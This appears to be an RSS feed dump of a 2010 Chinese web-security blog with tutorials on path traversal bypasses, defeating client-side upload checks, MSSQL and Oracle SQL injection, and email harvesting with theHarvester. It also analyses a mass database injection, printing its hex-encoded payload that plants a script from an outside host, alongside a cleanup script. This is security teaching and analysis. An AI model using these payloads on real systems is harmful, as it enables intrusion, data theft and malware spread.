路径遍历漏洞隐藏一般在文件读取或者展示图片功能块这样的通过参数提交上来的文件名,从这可以看出来过滤交互数据是完全有必要的。恶意攻击者当然后会利用对文件的读取权限进行跨越目录访问,比如访问一些受控制的文件,“../../../../../../../etc/passwd“或者”../../../../boot.ini“,当然现在部分网站都有类似Waf的防护设备,只要在数据中会有/etc /boot.ini等文件名出直接进行拦截。

遍历路径攻击变异

路径遍历漏洞是很常见的,在Web应用程序编写过程,会有意识的对传递过来的参数进行过滤或者直接删除,存在风险的过滤方式,一般可以采用如下方式进行突破:

以下是一些绕过的方法,当然在实际运行过程中,可以组合使用。

(1) 加密参数传递的数据;在Web应用程序对文件名进行加密之后再提交,比如:“downfile.jsp?filename= ZmFuLnBkZg- “,在参数filename用的是Base64加密,而攻击者要想绕过,只需简单的将文件名加密后再附加提交即可。所以说,采用一些有规律或者轻易能识别的加密方式,也是存在风险的。

(2)  编码绕过,尝试使用不同的编码转换进行过滤性的绕过,比如Url编码,通过对参数进行Url编码提交,“downfile.jsp?filename= %66%61%6E%2E%70%64%66“来绕过。

(3)  目录限定绕过;在有些Web应用程序是通过限定目录权限来分离的。当然这样的方法不值得可取的,攻击者可以通过某些特殊的符号“~“来绕过。形如这样的提交“downfile.jsp?filename=~/../boot”。能过这样一个符号,就可以直接跳转到硬盘目录下了。

(4)  绕过文件后缀过滤;一些Web应用程序在读取文件前,会对提交的文件后缀进行检测,攻击者可以在文件名后放一个空字节的编码,来绕过这样的文件类型的检查。例如:../../../../boot.ini%00.jpg,Web应用程序使用的Api会允许字符串中包含空字符,当实际获取文件名时,则由系统的Api会直接截短,而解析为“../../../../boot.ini”。在类Unix的系统中也可以使用Url编码的换行符,例如:../../../etc/passwd%0a.jpg如果文件系统在获取含有换行符的文件名,会截短为文件名。也可以尝试%20,例如: ../../../index.jsp%20

(5)  绕过来路验证。在一些Web应用程序中,会有对提交参数的来路进行判断的方法,而绕过的方法可以尝试通过在网站留言或者交互的地方提交Url再点击或者直接修改Http Referer即可,这主要是原因Http Referer是由客户端浏览器发送的,服务器是无法控制的,而将此变量当作一个值得信任源是错误的。

防范遍历路径漏洞

在防范遍历路径漏洞的方法中,最有效的是权限的控制,谨慎的处理向文件系统API传递过来的参数路径。主要是因为大多数的目录或者文件权限均没有得到合理的配置,而Web应用程序对文件的读取大多依赖于系统本身的API,在参数传递的过程,如果没有得严谨的控制,则会出现越权现象的出现。在这种情况下,Web应用程序可以采取以下防御方法,最好是组合使用。

(1)  数据净化,对网站用户提交过来的文件名进行硬编码或者统一编码,对文件后缀进行白名单控制,对包含了恶意的符号或者空字节进行拒绝。

(2)  Web应用程序可以使用chrooted环境访问包含被访问文件的目录,或者使用绝对路径+参数来控制访问目录,使其即使是越权或者跨越目录也是在指定的目录下。

总结

路径遍历漏洞允许恶意攻击者突破Web应用程序的安全控制,直接访问攻击者想要的敏感数据 ,包括配置文件、日志、源代码等,配合其它漏洞的综合利用,攻击者可以轻易的获取更高的权限,并且这样的漏洞在发掘上也是很容易的,只要对Web应用程序的读写功能块直接手工检测,通过返回的页面内容来判断,是很直观的,利用起来也相对简单。

]]> http://www.nuanyue.com/%e6%b5%85%e6%9e%90%e8%b7%af%e5%be%84%e9%81%8d%e5%8e%86%e6%bc%8f%e6%b4%9e.html/feed 3 突破本地验证 继续上传 http://www.nuanyue.com/%e7%aa%81%e7%a0%b4%e6%9c%ac%e5%9c%b0%e9%aa%8c%e8%af%81%e7%bb%a7%e7%bb%ad%e4%b8%8a%e4%bc%a0.html http://www.nuanyue.com/%e7%aa%81%e7%a0%b4%e6%9c%ac%e5%9c%b0%e9%aa%8c%e8%af%81%e7%bb%a7%e7%bb%ad%e4%b8%8a%e4%bc%a0.html#comments Thu, 15 Apr 2010 14:28:25 +0000 http://www.nuanyue.com/?p=1270 文/饭 Web应用程序的编写,在满足其功能的同时却鲜有人关注其安全性,从市场上推出的各类Web应用防火墙不难理解,Web应用程序主要面临哪些安全威胁呢?如Sql注入、网页木马、表单绕过、跨站脚本、Xpath注入、口令爆力破解、客户端伪造请求 …等,而其漏洞根源在于开发者完全没有安全意识到而导致的。而本文将和大家讨论本地验证的缺陷,本地验证的最大的优点应该是减轻服务器端的计算负荷,而其带来的安全胁威却足以令服务器沦陷为肉机。

突破本地验证

本地验证的方法,一般是使用javaScript脚本简单验证,比如上传格式的验证,输入内容长度的验证,如果服务器端也不进行二次验证的话,易导致恶意攻击者只需在本地稍作修改就可以实现完全意义上的绕过。比如前些年比较流行的上传漏洞,其成因一般是因为对上传的文件类型或者扩展名过滤不严格造成的,导致可以直接或间接上传脚本木马,在检测一网站时,从扫描结果得到一上传网页,如图:

查看页面源代码时,发现判断上传后缀是使用运行在本地的JS代码。代码如下:
提交表单的代码如下:
代码里“action”指的就是提交地址。针对上面简单的利用方法是:[......]

全文阅读

]]> 文/饭

Web应用程序的编写,在满足其功能的同时却鲜有人关注其安全性,从市场上推出的各类Web应用防火墙不难理解,Web应用程序主要面临哪些安全威胁呢?如Sql注入、网页木马、表单绕过、跨站脚本、Xpath注入、口令爆力破解、客户端伪造请求 …等,而其漏洞根源在于开发者完全没有安全意识到而导致的。而本文将和大家讨论本地验证的缺陷,本地验证的最大的优点应该是减轻服务器端的计算负荷,而其带来的安全胁威却足以令服务器沦陷为肉机。

突破本地验证

本地验证的方法,一般是使用javaScript脚本简单验证,比如上传格式的验证,输入内容长度的验证,如果服务器端也不进行二次验证的话,易导致恶意攻击者只需在本地稍作修改就可以实现完全意义上的绕过。比如前些年比较流行的上传漏洞,其成因一般是因为对上传的文件类型或者扩展名过滤不严格造成的,导致可以直接或间接上传脚本木马,在检测一网站时,从扫描结果得到一上传网页,如图:

查看页面源代码时,发现判断上传后缀是使用运行在本地的JS代码。代码如下:

<script type="text/javascript"><!--mce:0--></script>

提交表单的代码如下:

<form action="/photoimgAction.do?method=savePhotoimg" accept-charset="UNKNOWN" enctype="multipart/form-data" method="post">
</form>

代码里“action”指的就是提交地址。针对上面简单的利用方法是:
只需要把上传页面保存到本地,扩展名必须是html或者是htm。再为提交地址补全路径,如上面的地址修改成

http://www.nuanyue.com/photoimgAction.do?method=savePhotoimg

即代码:

点击“保存”按钮就可以在没有文件名后缀限制能直接上传脚本了。
当然这种方法仅仅是对上传页面后缀为htm或者html的利用。当遇上到动态页面或者有更多限制时,还可以用Firefox的Firebug的插件进行动态调试,如图:

可以动态调试JavaScript,添加监控点、断点,进行实时修改过程参数。但这种方法在利用时,可能会有些麻烦多处添加断点。一种更简单的方法是使用Opera浏览器,先启动Opera浏览器访问上传页面,点击查看源代码,如图:

修改”.gif”为”.jsp”,再点击左上角的应用,修改过的源代码就已经应用到当前浏览的页面,通过修改javascript的本地验证流程,实行绕过上传。如图:

返回页面直接上传,如图:

结束

许多Web程序编写者,都喜欢把一些验证放在客户端,比如上传的后缀格式验证,用户和密码的验证等直接往服务端传送,而在服务端完全没有验证而直接利用。从而导致恶意攻击者只要在本地稍作修改就可以直接绕过本地验证,而本质上这种验证形同虚设,毫无意义。

]]> http://www.nuanyue.com/%e7%aa%81%e7%a0%b4%e6%9c%ac%e5%9c%b0%e9%aa%8c%e8%af%81%e7%bb%a7%e7%bb%ad%e4%b8%8a%e4%bc%a0.html/feed 8 清理数据库批量挂马 http://www.nuanyue.com/%e6%b8%85%e7%90%86%e6%95%b0%e6%8d%ae%e5%ba%93%e6%89%b9%e9%87%8f%e6%8c%82%e9%a9%ac.html http://www.nuanyue.com/%e6%b8%85%e7%90%86%e6%95%b0%e6%8d%ae%e5%ba%93%e6%89%b9%e9%87%8f%e6%8c%82%e9%a9%ac.html#comments Sat, 10 Apr 2010 14:48:45 +0000 http://www.nuanyue.com/?p=1243 文/饭

数据库批量挂马,已经成为挂马的一种主要方式,网上也有许多不同的挂马代码被站长们公布,大多形不同而意同,还有变异的直接突破waf的,再现了挂与反挂之间的激烈较量。ZZZzzz…. 情绪稳定的分析注入语句如下:

dEcLaRe @s vArChAr(8000) sE[......]

全文阅读

]]> 文/饭

数据库批量挂马,已经成为挂马的一种主要方式,网上也有许多不同的挂马代码被站长们公布,大多形不同而意同,还有变异的直接突破waf的,再现了挂与反挂之间的激烈较量。ZZZzzz…. 情绪稳定的分析注入语句如下:

dEcLaRe @s vArChAr(8000) sEt @s=
0x6445634c615265204074207641724368417228323535292c406320764172436841722832353529206445634c615265207441624c655f637572736f5220635572536f5220466f522073456c45635420612e6e416d452c622e6e416d452046724f6d207359734f624a6543745320612c735973436f4c754d6e53206220774865526520612e69443d622e694420416e4420612e78547950653d27752720416e442028622e78547950653d3939206f5220622e78547950653d3335206f5220622e78547950653d323331206f5220622e78547950653d31363729206f50654e207441624c655f637572736f52206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c4063207768696c6528404066457443685f7374617475733d302920624567496e20657865632827557044615465205b272b40742b275d20734574205b272b40632b275d3d727472696d28636f6e7665727428764172436841722c5b272b40632b275d29292b27273c2f7469746c653e223e3c736372697074207372633d687474703a2f2f2536312532452537302537302536442536442536462536462532452536332536453e3c2f7363726970743e3c212d2d27272729206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c406320654e6420634c6f5365207441624c655f637572736f52206445416c4c6f43615465207441624c655f637572736f52 eXeC(@s)--

利用了动态执行,对上次这段代码进行十六进制转换整理如下:

dEcLaRe @t vArChAr(255),@c vArChAr(255) –定义变量
 
dEcLaRe tAbLe_cursoR cUrSoR –游标
 
FoR sElEcT a.nAmE,b.nAmE FrOm sYsObJeCtS a,sYsCoLuMnS b wHeRe a.iD=b.iD AnD a.xTyPe='u' AnD (b.xTyPe=99 oR b.xTyPe=35 oR b.xTyPe=231 oR b.xTyPe=167) –遍历表和字段
 
oPeN tAbLe_cursoR fEtCh next FrOm tAbLe_cursoR iNtO @t,@c
 
while(@@fEtCh_status=0) –开始
 
bEgIn
 
exec('UpDaTe ['+@t+'] sEt ['+@c+']=rtrim(convert(vArChAr,['+@c+']))+''&lt;/title&gt;"&gt;&lt;script src=http:// a.ppmmoo.cn &gt;&lt;/script&gt;&lt;!--''') –执行更新
 
fEtCh next FrOm tAbLe_cursoR iNtO @t,@c –游标指向下一记录
 
eNd –结束
 
cLoSe tAbLe_cursoR dEAlLoCaTe tAbLe_cursoR
存在于syscolumns表里面的name是列名,xtype是数据类型,其与数字的对应关系是:
xtype=99 'ntext'
xtype=35 'text'
xtype=231 'nvarchar'
xtype=167 'varchar'
此语句执行的是意思是,遍历用户创建的表,搜索列类型为ntext,text, nvarchar,varchar的列,之后与定义的游标进行关联,再利用游标进行update操作。
写入内容“<script src="http://a.ppmmoo.cn"><!--mce:0--></script>”,完全成数据库批量挂马。

如图:

直接写个语句去掉所插入的语句

use tempdb;
declare @t varchar(555),@c varchar(555) ,@inScript varchar(8000)
set @inScript='<script src="http://"><!--mce:1--></script>'
declare table_cursor cursor for select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
open table_cursor
fetch next from table_cursor into @t,@c
while(@@fetch_status=0)
begin
exec('update ['+@t+'] set  ['+@c+']=replace(cast(['+@c+'] as varchar(8000)),'''+@inScript+''','''')'  )
fetch next from table_cursor into @t,@c
end
close table_cursor
deallocate table_cursor;
清理完后,可以对数据库对象sysobjects、syscolumns的select权限去掉,防止这样的重复劳动SSSsss...
]]> http://www.nuanyue.com/%e6%b8%85%e7%90%86%e6%95%b0%e6%8d%ae%e5%ba%93%e6%89%b9%e9%87%8f%e6%8c%82%e9%a9%ac.html/feed 3 Oracle注入sys_context利用 http://www.nuanyue.com/oracle%e6%b3%a8%e5%85%a5%e8%bf%87%e7%a8%8b%e7%9a%84sys_context%e5%88%a9%e7%94%a8.html http://www.nuanyue.com/oracle%e6%b3%a8%e5%85%a5%e8%bf%87%e7%a8%8b%e7%9a%84sys_context%e5%88%a9%e7%94%a8.html#comments Tue, 06 Apr 2010 11:45:35 +0000 http://www.nuanyue.com/?p=1230 文/

Oracle可以用sys_context来获取基本信息,记录如下:
http://www.nuanyue.com/test.jsp=1′ and ascii(substr(length((sys_context(‘userenv’,'db_nameR[......]

全文阅读

]]> 文/

Oracle可以用sys_context来获取基本信息,记录如下:
http://www.nuanyue.com/test.jsp=1′ and ascii(substr(length((sys_context(‘userenv’,'db_name’))),0,1))=89
检查db_name的字符个数的 的ASCII值是89
http://www.nuanyue.com/test.jsp=1′ and ascii(substr((sys_context(‘userenv’,'db_name’)),1,1))=109
http://www.nuanyue.com/test.jsp=1′ and ascii(substr((sys_context(‘userenv’,'db_name’)),2,1))>0
//获取第一个字符的ASCII值,其它类推,以下是可以获取的信息。

select
SYS_CONTEXT(‘USERENV’,'TERMINAL’) terminal,
SYS_CONTEXT(‘USERENV’,'LANGUAGE’) language,
SYS_CONTEXT(‘USERENV’,'SESSIONID’) sessionid,
SYS_CONTEXT(‘USERENV’,'INSTANCE’) instance,
SYS_CONTEXT(‘USERENV’,'ENTRYID’) entryid,
SYS_CONTEXT(‘USERENV’,'ISDBA’) isdba,
SYS_CONTEXT(‘USERENV’,'NLS_TERRITORY’) nls_territory,
SYS_CONTEXT(‘USERENV’,'NLS_CURRENCY’) nls_currency,
SYS_CONTEXT(‘USERENV’,'NLS_CALENDAR’) nls_calendar,
SYS_CONTEXT(‘USERENV’,'NLS_DATE_FORMAT’) nls_date_format,
SYS_CONTEXT(‘USERENV’,'NLS_DATE_LANGUAGE’) nls_date_language,
SYS_CONTEXT(‘USERENV’,'NLS_SORT’) nls_sort,
SYS_CONTEXT(‘USERENV’,'CURRENT_USER’) current_user,
SYS_CONTEXT(‘USERENV’,'CURRENT_USERID’) current_userid,
SYS_CONTEXT(‘USERENV’,'SESSION_USER’) session_user,
SYS_CONTEXT(‘USERENV’,'SESSION_USERID’) session_userid,
SYS_CONTEXT(‘USERENV’,'PROXY_USER’) proxy_user,
SYS_CONTEXT(‘USERENV’,'PROXY_USERID’) proxy_userid,
SYS_CONTEXT(‘USERENV’,'DB_DOMAIN’) db_domain,
SYS_CONTEXT(‘USERENV’,'DB_NAME’) db_name,
SYS_CONTEXT(‘USERENV’,'HOST’) host,
SYS_CONTEXT(‘USERENV’,'OS_USER’) os_user,
SYS_CONTEXT(‘USERENV’,'EXTERNAL_NAME’) external_name,
SYS_CONTEXT(‘USERENV’,'IP_ADDRESS’) ip_address,
SYS_CONTEXT(‘USERENV’,'NETWORK_PROTOCOL’) network_protocol,
SYS_CONTEXT(‘USERENV’,'BG_JOB_ID’) bg_job_id,
SYS_CONTEXT(‘USERENV’,'FG_JOB_ID’) fg_job_id,
SYS_CONTEXT(‘USERENV’,'AUTHENTICATION_TYPE’) authentication_type,
SYS_CONTEXT(‘USERENV’,'AUTHENTICATION_DATA’) authentication_data
from dual
]]> http://www.nuanyue.com/oracle%e6%b3%a8%e5%85%a5%e8%bf%87%e7%a8%8b%e7%9a%84sys_context%e5%88%a9%e7%94%a8.html/feed 0 常用的社工工具 http://www.nuanyue.com/%e5%b8%b8%e7%94%a8%e7%9a%84%e7%a4%be%e5%b7%a5%e5%b7%a5%e5%85%b7%e6%95%b4%e7%90%86.html http://www.nuanyue.com/%e5%b8%b8%e7%94%a8%e7%9a%84%e7%a4%be%e5%b7%a5%e5%b7%a5%e5%85%b7%e6%95%b4%e7%90%86.html#comments Thu, 25 Feb 2010 04:38:15 +0000 http://www.nuanyue.com/?p=1227 一: 收集邮件地址工具
theharvester通过搜索引擎查找邮件地址的工具,其用法如下:
Searching emails accounts for the domain microsoft.com, it will work with the first 500 google results:[......]

全文阅读

]]> 一: 收集邮件地址工具
theharvester通过搜索引擎查找邮件地址的工具,其用法如下:
Searching emails accounts for the domain microsoft.com, it will work with the first 500 google results:
./theharvester.py -d microsoft.com -l 500 -b google
Searching emails accounts for the domain microsoft.com in a PGP server, here it’s not necessary to specify the limit.
./theharvester.py -d microsoft.com -b pgp
Searching for user names that works in the company microsoft, we use google as search engine, so we need to specify the limit of results we want to use:
./theharvester.py -d microsoft -l 200 -b linkedin

Downloads

* theHarvester 1.5 – Tar (9/02/2010)

]]> http://www.nuanyue.com/%e5%b8%b8%e7%94%a8%e7%9a%84%e7%a4%be%e5%b7%a5%e5%b7%a5%e5%85%b7%e6%95%b4%e7%90%86.html/feed 0 绕过单引号继续注入 http://www.nuanyue.com/%e7%bb%95%e8%bf%87%e5%8d%95%e5%bc%95%e5%8f%b7%e7%bb%a7%e7%bb%ad%e6%b3%a8%e5%85%a5.html http://www.nuanyue.com/%e7%bb%95%e8%bf%87%e5%8d%95%e5%bc%95%e5%8f%b7%e7%bb%a7%e7%bb%ad%e6%b3%a8%e5%85%a5.html#comments Mon, 22 Feb 2010 13:21:27 +0000 http://www.nuanyue.com/?p=1192 文/图  

Web应用程序一般都会使用数据库来保存各种信息,比如电子商务网站的帐户信息、销售商品的价格,订单、支付细节、和各种不同的权限数值等。数据库中的信息的读取、更新、增加或者删除等都是通过SQL来实现的,因此,在数据交互的环节没有安全过滤净化,则可能易于受到SQL注入攻击,严重的可能导致数据[......]

全文阅读

]]> 文/图  

Web应用程序一般都会使用数据库来保存各种信息,比如电子商务网站的帐户信息、销售商品的价格,订单、支付细节、和各种不同的权限数值等。数据库中的信息的读取、更新、增加或者删除等都是通过SQL来实现的,因此,在数据交互的环节没有安全过滤净化,则可能易于受到SQL注入攻击,严重的可能导致数据库非法操作,但是随着时间的推移,Web应用程序的开发者安全意识的日渐增强,SQL注入漏洞已经呈下降消失状态,但是之前的Web程序在被动防范SQL攻击时,还是略显乏力,或者说是考虑不太周全。比如说普遍使用的过滤关键字的方法,如果仅仅过滤单引号或者小写类的关键字,则极易出现绕过的情形,而国内的安全公司相继推出的硬件WAF是否会存在同样的问题呢?从根本上说硬件WAF基于访问请求流量来鉴别攻击行为,可能在以后的攻防对立的演化过程也会慢慢有爆出被绕过的问题,所有的问题依然存在。本文试着在注入的SQL语句中不引用单引号,来和大家讨论一下注入攻击的部分原理和技巧。在一次测试中,发现一注入点过滤了单引号和小写的关键字,提交语句如下:

http://www.nuanyue.com/Test.asp?id=28′ AND 1=(SELECT @@VERSION)—

去掉单引号再次提交:

 http://www.nuanyue.com/Test.asp?id=28 AND 1=(SELECT @@VERSION)—

成功爆出数据库的系统版本了,说明在处理数据提交时,网站即使过滤了单引号了,依然可以注入。以下将和大家讨论获取数据库名、获取表名、获取列名、获取值等内容的部分SQL语句。在Mssql2005的master.dbo.sysdatabases表中存放着SQLSERVER数据库系统中的所有的数据库信息,仅需要PUBLIC权限就可以进行select操作:

use master;

SELECT * FROM MASTER.DBO.SYSDATABASES

一至四,都是系统自带的数据库名,所以可以通过dbid这个查询变量来一一进行爆出数据库名,提交查询语句:

 http://www.nuanyue.com/Test.asp?id=28 AND 1 IN (SELECT NAME FROM MASTER.DBO.SYSDATABASES WHERE DBID=3)

查询语句通过dbid取值从1至到无法爆出数据库名为至。

在Mssql2005版本里每个数据库都有一个用来存放表名信息的表,其权限同样仅public权限就能查询了,表名为:INFORMATION_SCHEMA.TABLES。

use master ;

select * from INFORMATION_SCHEMA.TABLES;

表名就存储在TABLE_NAME列里,通过使用条件查询语句限制型“Top 1”,一条条纪录爆出表名来。

 http://www.nuanyue.com/Test.asp?id=28 AND 1 IN (SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES)

其为爆出的第一条纪录。如想爆出第一条记录,即可以使用sql语法的条件语句“where table_name !=0x已经爆出表名的十六进制”来取内容。先取已爆表名的十六进制。

再提交语句如下:

 http://www.nuanyue.com/Test.asp?id=28 AND 1 IN (SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME!=0x41006400760065007200740069007A0065007200)

成功爆出第二个表名,剩下的以此类推。当然读取数据库的INFORMATION_SCHEMA.TABLES表内容,只是当前数据库的表名,如果要读取整个数据库的表名,可以读sysobjects表的name列名,原理同上。

在获取表名,得到列名是注入的下一个关键问题,在MSSQL 2005的数据库里,有张表名sys.all_objects里存放着表与列的信息,其表的列名object_id里存放着一个数值,对应着另一表名sys.all_columns里的列名ID,而sys.all_columns表里存放着列的信息。执行:

Select * from sys.all_objects

由上图可知,列名name和列名object_id是有对应的。在注入时,可以通过指定name值来指定爆表的object_id的值。提交:

 http://www.nuanyue.com/Test.asp?id=28 AND 999999< (SELECT TOP 1 CAST([OBJECT_ID] AS NVARCHAR(20)) FROM SYS.ALL_OBJECTS WHERE43006C00690063006B0049005000)—

以上语句是无法直接爆出数值来的,但是可以用折半法来进行猜解,由于其数值都在10位以上,所以,其法也不太可能,但是可以联合两张表来直接查询。再次提交:

 http://www.nuanyue.com/Test.asp?id=28 AND 9 in (SELECT B.NAME FROM SYSOBJECTS A,SYSCOLUMNS B WHERE A.ID=B.ID AND A.NAME=0x43006C00690063006B0049005000)—

 

已经爆出表名0x43006C00690063006B0049005000的第一个列名ID了,可以加入条件”and B.NAMe != 0x已经爆出的列名”, 类推可以依次爆出。

 http://www.nuanyue.com/Test.asp?id=28 AND 9 in (SELECT B.NAME FROM SYSOBJECTS A,SYSCOLUMNS B WHERE A.ID=B.ID AND A.NAME=0x43006C00690063006B0049005000 AND B.NAME!=0×49004400)—

在获取了表名和列名之后,获取其值也是很简单的。比较常用的有比如这样的获取值的:

http://www.nuanyue.com/Test.asp?id=28 AND 77= (SELECT ascii(@@VERSION))

http://www.nuanyue.com/Test.asp?id=28 AND 1=2 UNSION SELECT 1,2,3..@@VERSION–…

一种是爆错对比,一种是union操作。第一种是基于查询后值的对比,而union操作是将执行返回的结果直接在浏览器显示,从而避免繁琐的折半猜测,在使用union操作时,前提则是前后查询的两种结果的结构相同,即是列名数相同,可以通过“order by 列名数“来鉴别。

 http://www.nuanyue.com/Test.asp?id=28 order by 1—

 http://www.nuanyue.com/Test.asp?id=28 order by 2

 http://www.nuanyue.com/Test.asp?id=28 Order by 8—

此时,返回错误页面,即说明列名数是8,执行语句:

 http://www.nuanyue.com/Test.asp?id=28 and 1=2 Unsion select 1,2,3,4,5,6,7,8—

来取出纪录。

防范SQL注入攻击,尽管不同的数据库也会有不同的攻击技巧,复杂程序也各不相同,而许多SQL注入防范措施仅仅从某一处着手或者部分有效,从一个安全整体的角度立体的防护或许是值得借鉴的方法,比如从代码逻辑层、数据库层、网络层、系统层等,从本文阐述的原理来看,下次针对数据库的安全加固,你是否会调整一下“SYSOBJECTS、SYSCOLUMNS”等对象的权限呢?好像数据库批量挂马也有用到这两个表哦!

]]> http://www.nuanyue.com/%e7%bb%95%e8%bf%87%e5%8d%95%e5%bc%95%e5%8f%b7%e7%bb%a7%e7%bb%ad%e6%b3%a8%e5%85%a5.html/feed 8 恭祝春节快乐 http://www.nuanyue.com/%e6%81%ad%e7%a5%9d%e6%98%a5%e8%8a%82%e5%bf%ab%e4%b9%90.html http://www.nuanyue.com/%e6%81%ad%e7%a5%9d%e6%98%a5%e8%8a%82%e5%bf%ab%e4%b9%90.html#comments Wed, 10 Feb 2010 04:27:33 +0000 http://www.nuanyue.com/?p=1185 春节快到了,恭祝大家:虎虎生财 大吉大利  春节快乐 。

]]> 春节快到了,恭祝大家:虎虎生财 大吉大利  春节快乐 。

]]> http://www.nuanyue.com/%e6%81%ad%e7%a5%9d%e6%98%a5%e8%8a%82%e5%bf%ab%e4%b9%90.html/feed 1